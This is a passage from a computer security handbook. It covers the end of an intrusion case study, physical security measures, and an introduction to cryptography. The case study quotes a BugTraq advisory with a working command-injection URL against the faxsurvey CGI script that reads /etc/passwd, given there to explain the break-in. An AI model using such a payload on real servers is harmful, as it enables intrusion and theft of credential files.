    TERMCAP=xterm|vi|xterm-ic|xterm-vi|xterm with insert character instead of insert mode: :al@:dl@:im=:ei=:mi@:ic=\E[@: :AL=\E[%dL:DC=\E[%dP:DL=\E[%dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA: :al=\E[L:am: :bs:cd=\E[J:ce=\E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80: :cs=\E[%i%d;%dr:ct=\E[3k: :dc
    SERVER_PORT=80
    SCRIPT_NAME=/cgi-bin/faxsurvey
    HOSTTYPE=i386

After the intrusion, the victim ISP contacted the Boston office of the Federal Bureau of Investigation. The ISP was informed that the Boston office had a damage threshold of $8,000 that needed to be exceeded before an investigation could be opened. As this threshold had not been met, no investigation would take place. While such minimums are understandable, they are unfortunate for two reasons:

· Many attacks are conducted by relatively young offenders, who might cease such activity if they received a warning or, at most, a suspended sentence. The lack of any official investigation and follow-up only encourages these attackers to engage in larger and larger crimes until they are responsible for serious damage.
· In this case, the attacker appeared to be quite sophisticated. It's quite possible that the attacker was engaged in other illegal activities that usually go by without anyone noticing. There are many cases in which the investigation of relatively small crimes has led law enforcement agencies to significant criminal enterprises.
For example, it was a 75-cent accounting discrepancy that caused Cliff Stoll to track down a computer hacker who was ultimately found to be breaking into US commercial and military computers at the behest of the Soviet Union (a story detailed in Stoll's classic hacker thriller, The Cuckoo's Egg).

As it turns out, the vulnerability in the faxsurvey script had been reported over the BugTraq mailing list nearly three months prior to the attack. Either nobody from the ISP had been reading the BugTraq mailing list, or else no one was aware that the faxsurvey script had been installed:

    Date: Tue, 4 Aug 1998 07:41:24 -0700
    Reply-To: dod@muenster.net
    From: Tom
    Subject: remote exploit in faxsurvey cgi-script

    Hi!

    There exists a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command s/he wants with the permissions of the HTTP-Server.

    All the attacker has to do is type
    http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
    in his favorite Web-Browser to get a copy of your Password-File.

    All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package installed are vulnerable to this attack.

    AFAIK the problem exists in the call of 'eval'.

    I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild told me, that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just remove the script from the file list.

After the break-in, the ISP performed the following cleanup:

· An immediate backup of all disks was done. This backup was preserved as evidence in the event that damage was discovered that needed to be addressed.
· The system was scanned for new privileged files. None were found.
· Permissions on the /usr/include directory and the C compiler were changed so that only staff members could access these files and compile new programs.
· Key programs were compared with the distribution CD-ROM to determine if any had been modified. They had not been.
· All log files were manually examined for additional suspicious activity. None was found.
· After a week, the router rule blocking access to SplitRock was removed.

CHAPTER 3. PHYSICAL SECURITY

At a Glance

"Physical security" is almost everything that happens before you start typing commands on the keyboard. It's the building alarm system. It's the key lock on your computer's power supply, the locked computer room with the closed-circuit camera, and the uninterruptible power supply and power conditioners. Despite the fact that physical security is often overlooked, it is extraordinarily important. This chapter discusses many physical security threats, including environmental dangers, vandalism and sabotage, and theft. It offers suggestions for how to address them.

Elements of Physical Security

People First

It should go without saying that in an emergency or disaster situation, the lives and safety of personnel should always come before data or equipment. Although there may be very limited exceptions to this rule (in certain military situations), you should never lose sight of what is truly irreplaceable.

Planning for the Forgotten Threats

Surprisingly, many organizations do not consider physical security. One New York investment house was spending tens of thousands of dollars on computer security measures to prevent break-ins during the day, only to discover that its cleaning staff was propping open the doors to the computer room at night while the floor was being mopped.
A magazine in San Francisco had more than $100,000 worth of computers stolen over a holiday: an employee had used his electronic key card to unlock the building and disarm the alarm system; after getting inside, the person went to the supply closet where the alarm system was located and removed the paper log from the alarm system's printer.

Other organizations feel that physical security is simply too complicated or too difficult to handle properly. Few organizations have the ability to protect their servers from a nuclear attack, a major earthquake, or a terrorist bombing. But it is important not to let these catastrophic possibilities paralyze and prevent an organization from doing careful disaster planning.

The issues that physical security encompasses--the threats, practices, and protections--are different for practically every different site and organization. Because every site is different, this chapter can't give you a set of specific recommendations. It can only give you a starting point, a list of issues to consider, and a suggested procedure for formulating your actual plan.

The Physical Security Plan

The first step to physically securing your installation is to formulate a written plan addressing your current physical security needs and your intended future direction. Ideally, your physical plan should be part of your site's written security policy. This plan should be reviewed by others for completeness, and it should be approved by your organization's senior management. Thus, the purpose of the plan is both planning and political buy-in.

Your security plan should describe the assets you're protecting, their value, the areas where they're located, and the likely threats and their associated probabilities. Don't forget to include information as an asset.
You'll also want to outline your security perimeter--the boundary between the rest of the world and your secure area--and any holes in the perimeter, along with your defenses, plans for strengthening them, and the cost of implementing those plans. If you are managing a particularly critical installation, take great care in formulating this plan. Have it reviewed by an outside firm that specializes in disaster recovery planning and risk assessment. Consider your security plan a sensitive document: by its very nature, it contains detailed information on your defenses' weakest points.

The Disaster Recovery Plan

You should also have a plan for immediately securing temporary computer equipment and for loading your backups onto new systems in case your computer is ever stolen or damaged. This plan is known as a disaster recovery plan. It should also include its own security component; even when you're operating at your disaster site or transitioning back to normal operations, it's best to operate securely. You can regularly test parts of this plan by renting or borrowing a computer system and trying to restore your backups. Less frequently, it's a good idea to test the entire plan, to confirm that your alternative facilities are available and will function when you need them.

Other Contingencies

Beyond the items mentioned earlier, you may also wish to consider the impact on your operations of the following:

Loss of phone service or network connections
How will the loss of service impact your regular operations?

Vendor continuity
How important is support? Can you move to another hardware or software system if your vendor goes out of business or makes changes you don't wish to adopt?

Significant absenteeism of staff
Will this impact your ability to operate?

Death or incapacitation of key personnel
Can every member of your computer organization be replaced? What are the contingency plans?
Disaster recovery planning efforts should fit into your organization-wide contingency plans. Saving data is often critical, but it becomes less useful when you don't have the space, power, or tools necessary to continue to operate anyway.

Protecting Computer Hardware

Physically protecting a computer presents many of the same problems that arise when protecting typewriters, jewelry, and file cabinets. As with a typewriter, an office computer is something that many people inside the office need to access on an ongoing basis. As with jewelry, computers are valuable and generally easy for a thief to sell. As with legal files and financial records, if you don't have a backup--or if the backup is stolen or destroyed along with the computer--the data you have lost may well be irreplaceable. Even if you do have a backup, you will still need to spend valuable time setting up a replacement system. Finally, there is always the chance that the stolen information itself, or even the mere fact that information was stolen, will be used against you.

To make matters worse, computers and computer media are temperamental. A computer's power supply can be blown out simply by leaving the machine plugged into the wall if lightning strikes nearby.

There are several measures that you can take to protect your computer system against physical threats. Many of them will simultaneously protect the system from dangers posed by nature, outsiders, and inside saboteurs.

Protecting Against Environmental Dangers

Computers often require exactly the right balance of physical and environmental conditions to operate properly. Altering this balance can cause your computer to fail in unexpected and often undesirable ways. Even worse, your computer might continue to operate erratically, producing incorrect results and corrupting valuable data.

Fire

Computers are notoriously bad at surviving fires.
You can increase the chances that your computer will be an exception by making sure that there is good fire-extinguishing equipment nearby, and that personnel are trained to use it. Automatic gas discharge systems and dry-pipe water-based sprinkler systems each have advantages and disadvantages that should be carefully considered (PUIS, 198-200). Be sure that your wiring is protected, in addition to your computers. Be certain that smoke detectors and sprinkler heads, if used, are appropriately positioned to cover wires in wiring trays (often above your suspended ceilings) and in wiring closets.

Smoke

Smoke is very damaging to computer equipment. Smoke is a potent abrasive and collects on the heads of unsealed magnetic disks, optical disks, and tape drives. Sometimes smoke is generated by computers themselves. Electrical fires--particularly those caused by the transformers in video monitors--can produce a pungent, acrid smoke that may damage other equipment and may also be poisonous or carcinogenic. Another significant danger is the smoke that comes from cigarettes and pipes. Install smoke detectors in every room with computer equipment, and be sure to mount them under raised floors and over suspended ceilings as well. Do not permit smoking in your computer room. (PUIS, 200-201)

Earthquake

Nearly every part of the planet experiences the occasional temblor. While some buildings collapse in an earthquake, most remain standing. Careful attention to the placement of shelves and bookcases in your office can increase the chances that you and your computers will survive all but the worst disasters. Avoid placing computers on any high surfaces or near windows; similarly, avoid placing other heavy objects on shelves near computers where they might fall onto your equipment. A good approach is to place computers under strong tables. Also consider physically attaching the computer to the surface on which it is resting.
You can use bolts, tie-downs, straps, or other implements. (This practice also helps deter theft.)

Temperature extremes

Computers, like people, operate best within certain temperature ranges. Most computer systems should be kept between 10 and 32 degrees Celsius (50 and 90 degrees Fahrenheit). If the ambient temperature around your computer gets too high, the computer cannot adequately cool itself, and internal components can be damaged. If the temperature gets too cold, the system can undergo thermal shock when it is turned on, causing circuit boards or integrated circuits to crack. Once you've determined what temperature ranges your computers can tolerate, maintain those temperatures. Pay particular attention to the heat discharge and air flow patterns of the machines. Use temperature alarms to monitor the ambient temperature. (PUIS, 203-204)

Electrical noise

Motors, fans, heavy equipment, and even other computers generate electrical noise that can cause intermittent problems with the computer you are using. This noise can be transmitted through space or through nearby power lines. Electrical surges are a special kind of electrical noise that consists of one (or a few) high-voltage spikes. If possible, each computer should have a separate electrical circuit with an isolated ground and power filtering equipment; in no case should a computer share a circuit with heavy equipment. Radio transmitters (including cellular phones) should be kept away from computers. (PUIS, 204-205)

Lightning

Lightning generates large power surges that can damage even computers with otherwise protected electrical supplies. If lightning strikes your building's metal frame (or hits your building's lightning rod), the resulting current can generate an intense magnetic field on its way to the ground. Computers should be unplugged during lightning storms; if that's not possible, invest in surge suppression devices.
Although they won't protect against a direct strike, they can help when storms are distant. Magnetic media should be stored as far as possible from the building's structural steel members. Never run copper network cable outdoors unless it's in a metal conduit. (PUIS, 205)

Water

Water can destroy your computer. The primary danger is an electrical short, which can happen if water bridges between a circuit board trace carrying voltage and a trace carrying ground. Water usually comes from rain or flooding. Sometimes it comes from an errant sprinkler system. Water may also come from strange places, such as a toilet overflowing on a higher floor, vandalism, or the fire department. Keep computers out of basements that are prone to flooding. Mount water sensors on the floor of computer rooms, as well as under raised floors, and use them to automatically cut off power in the event of a flood.

Food and drink

Food--especially oily food--collects on people's fingers and from there gets on anything that a person touches. Often this includes dirt-sensitive surfaces such as magnetic tapes and optical disks. One of the fastest ways of putting a desktop keyboard out of commission is to pour a soft drink or cup of coffee between the keys. Generally, the simplest rule is the safest: keep all food and drink away from your computer systems.209

209 Perhaps more than any other rule in this chapter, this rule is honored most often in the breach.

Other environmental hazards

Several other environmental hazards bear consideration:

· Dust. Keep computer rooms as dust-free as possible, and use a computer vacuum with a microfilter on a regular basis. (PUIS, 201-202)
· Explosion. If you need to operate a computer in an area where there is a risk of explosion, you might consider purchasing a system with a ruggedized case. Backups should be kept in blast-proof vaults or off-site. (PUIS, 203)
· Insects. Take active measures to limit the amount of insect life in your machine room. (PUIS, 204)
· Vibration. In a high-vibration environment, place computers on a rubber or foam mat if you can do so without blocking ventilation openings. (PUIS, 205-206)
· Humidity. Monitor and maintain an appropriate humidity.

Environmental monitoring

To detect spurious problems, continuously monitor and record your computer room's temperature and relative humidity. As a general rule of thumb, every 1,000 square feet of office space should have its own recording equipment. Log and check recordings on a regular basis.

Controlling Physical Access

Simple common sense will tell you to keep your computer in a locked room. But how safe is that room? Sometimes a room that appears to be safe is actually wide open.

Raised floors and dropped ceilings

In many modern office buildings, internal walls do not extend above dropped ceilings or beneath raised floors. This type of construction makes it easy for people in adjoining rooms, and sometimes adjoining offices, to gain access.

Entrance through air ducts

If the air ducts that serve your computer room are large enough, intruders can use them to gain entrance to an otherwise secured area. Areas that need a lot of ventilation should be served by several small ducts, or should have screens welded over air vents or inside the ducts. In a very high-security environment, motion detectors can be placed inside air ducts.

Glass walls

Although glass walls and large windows frequently add architectural panache, they can be severe security risks. Glass walls are easy to break; a brick and a bottle of gasoline thrown through a window can cause an incredible amount of damage. An attacker can also gain critical knowledge, such as passwords or information about system operations, simply by watching people on the other side of a glass wall or window. It may even be possible to capture information from a screen by analyzing its reflective glow.
Interior glass walls are good for rooms which must be guarded but which the guard is not allowed to enter; in most other cases, avoid them. (PUIS, 208-209)

Defending Against Vandalism

Computer systems are good targets for vandalism. Reasons for vandalism include revenge, riots, strikes, political or ideological statements, or simply entertainment for the feebleminded. In principle, any part of a computer system--or the building that houses it--may be a target for vandalism. In practice, some targets are more vulnerable than others.

Ventilation holes

Several years ago, 60 workstations at the Massachusetts Institute of Technology were destroyed in a single evening by a student who poured Coca-Cola into each computer's ventilation holes. Computers that have ventilation holes need them. Don't seal up the holes to prevent this sort of vandalism. However, a rigidly enforced policy against food and drink in the computer room--or a 24-hour guard, in person or via closed-circuit TV--can help prevent this kind of incident from happening at your site.

Network cables

In many cases, a vandal can disable an entire subnet of workstations by cutting a single wire with a pair of wire cutters. Compared with Ethernet, fiber optic cables are at the same time more vulnerable (they can be more easily damaged), more difficult to repair (they are difficult to splice), and more attractive targets (they often carry more information). "Temporary" cable runs often turn into permanent installations, so take extra time and effort to install cable correctly the first time. One simple method for protecting a network cable is to run it through physically secure locations. For example, Ethernet can be run through steel conduits. Besides protecting against vandalism, this practice protects against some forms of network eavesdropping, and may help protect your cables in the event of a small fire.
Fiber optic cable can suffer small fractures if someone steps on it. A fracture of this type is difficult to locate because there is no break in the coating. Some high-security installations use double-walled, shielded conduits with a pressurized gas between the layers. Pressure sensors on the conduit cut off all traffic or sound a warning bell if the pressure ever drops, as might occur if someone breached the walls of the pipe.

Network connectors

In addition to cutting a cable, a vandal who has access to a network's endpoint--a network connector--can electronically disable or damage the network. All networks based on wire are vulnerable to attacks with high voltage.

Utility connections

In many buildings, electrical, gas, or water cutoffs may be accessible--sometimes even from the outside of the building. Because computers require electrical power, and because temperature control systems may rely on gas heating or water-cooling, these utility connections represent points of attack for a vandal.

Defending Against Acts of War and Terrorism

Because it is simply impossible to defend against many attacks, devise a system of hot backups and mirrored disks and servers. With a reasonably fast network link, you can arrange for files stored on one computer to be simultaneously copied to another system on the other side of town--or the other side of the world. Sites that cannot afford simultaneous backup can have hourly or nightly incremental dumps made across the network link. Although a tank or suicide bomber may destroy your computer center, your data can be safely protected someplace else.

Preventing Theft

Computer theft--especially laptop theft--can be merely annoying or can be an expensive ordeal. But if the computer contains information that is irreplaceable or extraordinarily sensitive, it can be devastating.
Many computer systems are stolen for resale--either the complete system or, in the case of sophisticated thieves, the individual components, which are harder to trace. Other computers are stolen by people who cannot afford to purchase their own computers. Still others are stolen for the information that they contain, usually by people who wish to obtain the information but sometimes by those who simply wish to deprive the computer's owner of the use of the information.

No matter why a computer is stolen, most computer thefts have one common element: opportunity. In most cases, computers are stolen because they have been left unprotected.

Laptops and other kinds of portable computers present a special hazard. They are easily stolen, difficult to tie down (they then cease to be portable!), and easily resold. Personnel with laptops should be trained to be especially vigilant in protecting their computers. In particular, theft of laptops in airports has been reported to be a major problem. Laptops should not be left unattended anywhere, for any period of time. If you're traveling by cab, keep your laptop with you, rather than in the trunk.

Fortunately, by following a small number of simple and inexpensive measures, you can dramatically reduce the chance that your laptop or desktop computer will be stolen.

Locks

One very good way to protect your computer from theft is to physically secure it. A variety of physical tie-down devices are available to bolt computers to tables or cabinets. Although they cannot prevent theft, they make it more difficult.

Mobility is one of the great selling points of laptops. It is also the key feature that leads to laptop theft. One of the best ways to decrease the chance of having your laptop stolen is to lock it, at least temporarily, to a desk, a pipe, or another large object. Most laptops sold today are equipped with a security slot.
For less than $50 you can purchase a cable lock that attaches to a nearby object and locks into the security slot. Once set, the lock cannot be removed without either using the key or damaging the laptop case, which makes it very difficult to resell the laptop. These locks prevent most grab-and-run laptop thefts.

Tagging

Another way to decrease the chance of theft and increase the likelihood of return is to etch equipment with your name and phone number or tag it with permanent or semi-permanent equipment tags. Tags make it very difficult for potential buyers or sellers to claim that they didn't know that the computer was stolen.

The best equipment tags are clearly visible and individually serial-numbered, so that an organization can track its property. A low-cost tagging system is manufactured by Secure Tracking of Office Property (http://www.stoptheft.com). These tags are individually serial-numbered and come with a three-year tracking service in Europe, Australia, Latin America, or North America. If a piece of equipment with a STOP tag is found, the company can arrange to have it sent by overnight delivery back to the original owner. An 800 number on the tag makes returning the property easy.

Laptop recovery software and services

Several companies now sell PC "tracing" programs. The tracing program hides in several locations on a laptop and places a call to the tracing service on a regular basis to reveal its location. The calls can be made using either a telephone line or an IP connection. Normally these "calls home" are ignored, but if the laptop is reported stolen to the tracing service, the police are notified about the location of the stolen property. Of course, many of these systems work on desktop systems as well as laptops. Thus, you can protect systems that you believe are at a heightened risk of being stolen.
Component theft

When RAM has been expensive, businesses and universities have suffered a rash of RAM thefts. Many computer businesses and universities have also had major thefts of advanced processor chips. RAM and late-model CPU chips are easily sold on the open market. They are virtually untraceable. And, when thieves steal only some of the RAM inside a computer, weeks or months may pass before the theft is noticed. If a user complains that a computer is suddenly running more slowly than it did the day before, check its RAM, and then check to see that its case is physically secured.

Encryption

If your computer is stolen, the information it contains will be at the mercy of the equipment's new "owners." They may erase it or they may read it. Sensitive information can be sold, used for blackmail, or used to compromise other computer systems.

You can never make something impossible to steal. But you can make stolen information virtually useless--provided that it is encrypted and the thief does not know the encryption key. For this reason, even with the best computer-security mechanisms and physical deterrents, sensitive information should be encrypted using an encryption system that is difficult to break. We recommend that you acquire and use a strong encryption system so that even if your computer is stolen, the sensitive information it contains will not be compromised.

Protecting Your Data

There is a strong overlap between the physical security of your computer systems and the confidentiality and integrity of your data. After all, if somebody steals your computer, they probably have your data. Unfortunately, there are many attacks on your data that may circumvent the physical measures mentioned in earlier sections.

Eavesdropping

Electronic eavesdropping is perhaps the most sinister type of data piracy.
Even with modest equipment, an eavesdropper can make a complete transcript of a victim's actions--every keystroke and every piece of information viewed on a screen or sent to a printer. The victim, meanwhile, usually knows nothing of the attacker's presence and blithely goes about his or her work, revealing not only sensitive information but also the passwords and procedures necessary for obtaining even more information. Tools exist for eavesdropping at many points, including the connection between the keyboard and the computer, data cables and wiring, Ethernet and fiber optic networks, wireless networks, and even by analyzing radio emissions from equipment. (PUIS, 216-219)

There are several ways to make eavesdropping more difficult:

· Routinely inspect all cables and wires carrying data for physical damage or modification, and consider using shielded or armored cable to make wiretapping more difficult. If you are very security-conscious, place cable in steel conduit.
· Make sure unused offices do not have live Ethernet ports. Use Ethernet switches instead of hubs. Run LAN monitoring software like arpwatch that detects packets with previously unknown MAC addresses, or use switches that can perform MAC address filtering. Use fiber optic cables in preference to twisted-pair networks when possible; they are harder to tap undetected.
· Avoid using wireless networks; if you must build a wireless network, enable all possible security features for defense-in-depth (e.g. encryption, firewalling, disabling SSID broadcasts, MAC filters, etc.). Because most of these features provide very little security, educate your users to always use a VPN or other encrypted tunnel for wireless networking. Place the wireless access point outside your firewall (or between two firewalls).
· Encryption provides significant protection against eavesdropping. Thus, in many cases, it makes sense to assume that your communications are being monitored and to encrypt all communications as a matter of course. When this is not feasible, at least encrypt all sensitive traffic (such as login names and passwords for remote services).

Protecting Backups

Backups should be a prerequisite of any computer operation--secure or otherwise--but the information stored on backup tapes is extremely vulnerable. Protect your backups at least as well as you normally protect your computers themselves. Never leave them unattended in a generally accessible area, keep them in physically secure locations (ideally, some in a location away from your computers), and be careful who you trust to ship them from location to location.

Most backup programs allow you to encrypt the data before it is written to backup. Encrypted backups dramatically reduce the chance that a backup tape or CD-ROM, if stolen, will be useful to an adversary. If you encrypt backups, be sure you protect the encryption key, both so that an attacker cannot learn it and so that your key will not be lost if you should change staff.

Sometimes, backups in archives are slowly erased by environmental conditions. Magnetic tape is also susceptible to a process called print-through, in which the magnetic domains on one piece of tape wound on a spool affect the next layer. The only way to find out if this process is harming your backups is to test them periodically.

A surprisingly common problem is inadequate labeling and inventorying of backup media. You can choose any system of labeling and cataloging that you find effective, as long as you choose one and document it clearly.

Sanitizing Media Before Disposal

When you discard disk drives, CD-ROMs, or tapes, make sure that the data on the media has been completely erased. This process is called sanitizing. Simply deleting a file that is on your hard disk doesn't delete the data associated with the file.
Parts of the original data--and sometimes entire files--can usually be easily recovered. Hard disks must be sanitized with special software that is specially written for each particular disk drive's model number and revision level. For tapes, you can use a degaussing machine or bulk eraser--a hand-held electromagnet that has a hefty field. Experiment with reading back the information stored on tapes that you have "bulk erased" until you know how much erasing is necessary to eliminate your data.

Some software exists to overwrite optical media, thus erasing the contents of even write-once items. However, the effectiveness of these methods varies from media type to media type, and the overwriting may still leave some residues. For this reason, physical destruction may be preferable. Incinerators and acid baths do a remarkably good job of destroying tapes, but are not environmentally friendly. Until recently, crushing was preferred for hard disk drives and disk packs. But as disk densities get higher and higher, disk drives must be crushed into smaller and smaller pieces to frustrate laboratory analysis of the resulting material. Degaussing machines are available for hard drives, but are expensive. As a result, physical destruction is losing popularity when compared with software-based techniques.

One common sanitizing method involves overwriting the entire disk or tape. If you are dealing with highly confidential or security-related materials, you may wish to overwrite the disk or tape several times, because data can be recovered from tapes that have been overwritten only once. Commonly, tapes are overwritten three times--once with blocks of 0s, then with blocks of 1s, and then with random numbers. Finally, the tape may be run through a band saw several times to reduce it to thousands of tiny pieces of plastic.
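The three-pass overwrite just described (0s, then 1s, then random data), followed by the read-back check the text recommends, as an added example in Python; this is not the handbook's code. It works on a single file through the operating system, so it illustrates the pattern rather than replacing whole-device tools: journaling and copy-on-write filesystems and wear-levelled flash can retain older copies that a file-level overwrite never touches, which is the same reason the text calls for drive-specific sanitization software. The temporary file name and the "secret" it holds are constructed for the demonstration.

```python
import os
import tempfile

# Pass order described in the text: blocks of 0s, then blocks of 1s, then random bytes.
PASSES = ("zeros", "ones", "random")
CHUNK = 64 * 1024


def _fill(pattern, n):
    """Return n bytes of the requested overwrite pattern."""
    if pattern == "zeros":
        return b"\x00" * n
    if pattern == "ones":
        return b"\xff" * n
    return os.urandom(n)


def overwrite_file(path, passes=PASSES):
    """Overwrite every byte of `path` in place, once per pattern in `passes`.

    Each pass is flushed and fsync'ed so the data reaches the device before the
    next pattern is written; otherwise the OS could merge the passes in cache.
    Returns the number of bytes overwritten in each pass.
    """
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for pattern in passes:
            f.seek(0)
            remaining = size
            while remaining > 0:
                n = min(CHUNK, remaining)
                f.write(_fill(pattern, n))
                remaining -= n
            f.flush()
            os.fsync(f.fileno())
    return size


def contains(path, needle):
    """Read the file back and report whether `needle` still occurs anywhere.

    This is the "read back what you erased" check; the scan keeps an overlap of
    len(needle) - 1 bytes so a needle straddling two chunks is still found.
    """
    keep = len(needle) - 1
    tail = b""
    with open(path, "rb") as f:
        while True:
            chunk = f.read(CHUNK)
            if not chunk:
                return False
            window = tail + chunk
            if needle in window:
                return True
            tail = window[-keep:] if keep else b""


def demo():
    """Constructed sample: a file holding a repeated secret, wiped and verified."""
    secret = b"PAYROLL-Q3-CONFIDENTIAL"          # constructed, 23 bytes
    fd, path = tempfile.mkstemp(prefix="sanitize-demo-")
    os.close(fd)
    try:
        with open(path, "wb") as f:
            f.write(secret * 5000)               # 115,000 bytes, spans several chunks
        size_before = os.path.getsize(path)
        found_before = contains(path, secret)
        overwrite_file(path)
        return {
            "size_before": size_before,
            "size_after": os.path.getsize(path),
            "found_before": found_before,
            "found_after": contains(path, secret),
        }
    finally:
        os.remove(path)


if __name__ == "__main__":
    print(demo())
```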
Sanitizing Printed Media

Printed material that may find its way into the trash may contain information that is useful to criminals or competitors. This includes printouts of software (including incomplete versions), memos, design documents, preliminary code, planning documents, internal newsletters, company phone books, manuals, and other material. Other information that may find its way into your dumpster includes the types and versions of your operating systems and computers, serial numbers, patch levels, and so on. It may include hostnames, IP numbers, account names, and other information critical to an attacker. We have heard of some firms disposing of listings of their complete firewall configuration and filter rules--a gold mine for someone seeking to infiltrate the computers.

Consider investing in shredders for each location where information of value might be thrown away. Educate your users not to dispose of sensitive material in their refuse at home, but to bring it in to the office to be shredded. If your organization is large enough and the law allows, you may also wish to incinerate some sensitive paper waste on-site.

Protecting Local Storage

In addition to computers and mass-storage systems, many other pieces of electronic data-processing equipment store information. For example, terminals, modems, and laser printers often have memory buffers that may be downloaded and uploaded with appropriate control sequences. Naturally, any piece of memory that is used to hold sensitive information presents a security problem, especially if that piece of memory is not protected with a password, encryption, or other similar mechanism. However, the local storage in many devices presents an additional security problem, because sensitive information is frequently copied into such local storage without the knowledge of the computer user.
Unattended Terminals

Unattended terminals where users have left themselves logged in present a special attraction for vandals (as well as for computer crackers). A vandal can access the person's files with impunity. Alternatively, the vandal can use the person's account as a starting point for launching an attack against the computer system or the entire network: any tracing of the attack will usually point fingers back toward the account's owner, not to the vandal. You should never leave terminals unattended for more than short periods of time.

Some systems or screensavers have the ability to log a user off automatically--or at least to blank his screen and lock his keyboard--when the user's terminal has been idle for more than a few minutes. Take advantage of these features.

Key Switches

Some kinds of computers have key switches that can be used to prevent the system from being rebooted in single-user mode. Some computers also have ROM monitors that prevent the system from being rebooted in single-user mode without a password. Sun's OpenBoot system and all new Macintosh systems support a password to control boot configuration access. Key switches and ROM monitor passwords provide additional security and should be used when possible.210 However, you should also remember that any computer can be unplugged. The most important way to protect a computer is to restrict physical access to that computer.

210 There's another good reason to set ROM monitor passwords. Consider what would happen if an attacker found a machine, set the password himself, and turned it off.

CHAPTER 4. INFORMATION SECURITY

At a Glance

This chapter focuses on mechanisms for protecting information from unwanted exposure, tampering, or destruction.
These aspects of security are usually referred to as confidentiality211 (preventing unauthorized users from accessing or modifying data and programs) and integrity (ensuring that information and software remain intact and correct). The discussion here is largely conceptual, though examples of the application of several principles on actual systems are given.

Cryptography

Cryptography is a collection of mathematical techniques for protecting information. Using cryptography, you can transform written words and other kinds of messages so that they are unintelligible to anyone who does not possess the specific mathematical key necessary to unlock the message. The process of using cryptography to scramble a message is called encryption. The process of unscrambling the message by use of the appropriate key is called decryption.

Cryptography is used to prevent information from being accessed by an unauthorized recipient. In theory, once a piece of information is encrypted, that information can be accidentally disclosed or intercepted by a third party without compromising the security of the information, provided that the key necessary to decrypt the information is not disclosed and that the method of encryption will resist attempts to decrypt the message without the key. In addition to enhancing confidentiality, cryptography has also been used to ensure message integrity and non-repudiation.

Cryptographic Algorithms and Functions

There are fundamentally two kinds of encryption algorithms:

Symmetric key algorithms
With these algorithms, the same key is used to encrypt and decrypt the message. Symmetric key algorithms are sometimes called secret key algorithms and sometimes called private key algorithms. Unfortunately, both of these names are easily confused with public key algorithms, which are unrelated to symmetric key algorithms. Symmetric key algorithms can be divided into two categories: block and stream.
Block algorithms encrypt data a block (many bytes) at a time, while stream algorithms encrypt byte-by-byte (or even bit-by-bit).

Asymmetric key algorithms
With these algorithms, one key is used to encrypt the message and another key to decrypt it. A particularly important class of asymmetric key algorithms are public key cryptosystems. The encryption key is normally called the public key in these algorithms because it can be made publicly available without compromising the secrecy of the message or the decryption key. The decryption key is normally called the private key or secret key.

Symmetric key algorithms are the workhorses of modern cryptographic systems. They are generally much faster than public key algorithms. They are also somewhat easier to implement. And finally, it is generally easier for cryptographers to ascertain the strength of symmetric key algorithms. Unfortunately, symmetric key algorithms have three problems that limit their use in the real world:

· For two parties to securely exchange information using a symmetric key algorithm, those parties must first exchange an encryption key. Exchanging an encryption key in a secure fashion can be quite difficult.
· As long as they wish to send or receive messages, both parties must keep a copy of the key, and must keep it safe. If one party's copy is compromised and the second party doesn't know this fact, then the second party might send a message to the first party--and that message could then be subverted using the compromised key.
· If each pair of parties wishes to communicate in private, then they need a unique key. This requires (N² - N) / 2 keys for N different users. This number quickly becomes unmanageable.

211 Or privacy, which is sometimes used interchangeably with confidentiality and sometimes refers more specifically to protecting personally identifiable information about individuals.
Public key algorithms overcome these problems by separating the encryption and decryption keys. In theory, public key technology makes it relatively easy to send somebody an encrypted message. People who wish to receive encrypted messages will typically publish their public keys in directories or make their keys otherwise readily available. Then, to send somebody an encrypted message, all you have to do is get a copy of her public key, encrypt your message, and send it to her. With a good public key system, you know that the only person who can decrypt the message is the person who possesses the matching private key, provided that the public key you obtained really belongs to her; binding keys to identities is a separate problem that public key mathematics alone does not solve. Furthermore, all you really need to store on your own machine is your private key (though it's convenient and unproblematic to have your public key available as well).

Public key cryptography can also be used for creating digital signatures. Like a handwritten signature, a digital signature is used to denote authenticity or intention. For example, you can sign a piece of electronic mail to indicate your authorship in a manner akin to signing a paper letter. And as with signing a bill of sale, you can electronically sign a transaction to indicate that you wish to purchase or sell something. Using public key technology, you use your private key to create the digital signature; others can then use your matching public key to verify it.

Unfortunately, public key algorithms are computationally expensive. In practice, public key encryption and decryption can require as much as 1,000 times more computer power than an equivalent symmetric key encryption algorithm. To get both the benefits of public key technology and the speed of symmetric encryption systems, most modern encryption systems actually use a combination:

Hybrid public/private cryptosystems
With these systems, slower public key cryptography is used to exchange a random session key, which is then used as the key for a (symmetric) private key algorithm.
(A session key is used only for a single encryption session and is then discarded.) Nearly all practical public key cryptography implementations are actually hybrid systems.

Finally, there is a special class of functions that are almost always used in conjunction with public key cryptography. These algorithms are not encryption algorithms at all. Instead, they are used to create a "fingerprint" of a file or a key:

Message digest functions
A message digest function generates a seemingly random pattern of bits for a given input. The digest value is computed in such a way that finding a different input that will exactly generate the given digest is computationally infeasible. Message digests are often regarded as fingerprints for files. Most systems that perform digital signatures sign a message digest of the data rather than the actual file data itself.

Cryptographic Strength of Symmetric Algorithms

Different encryption algorithms are not equal. Some systems are not very good at protecting data, allowing encrypted information to be decrypted without knowledge of the requisite key. Others are quite resistant to even the most determined attack. The ability of a cryptographic system to protect information from attack is called its strength. Strength depends on many factors, including:

· The secrecy of the key.
· The difficulty of guessing the key or trying out all possible keys (a key search). Longer keys are generally more difficult to guess or find.
· The difficulty of inverting the encryption algorithm without knowing the encryption key (breaking the encryption algorithm).
· The existence (or lack) of back doors, or additional ways by which an encrypted file can be decrypted more easily without knowing the key.
· The ability to recover the key, or the rest of the message, when the attacker already knows the plaintext corresponding to part of the ciphertext (called a known plaintext attack).
· The properties of the plaintext and knowledge of those properties by an attacker. For example, a cryptographic system may be vulnerable to attack if all messages encrypted with it begin or end with a known piece of plaintext.

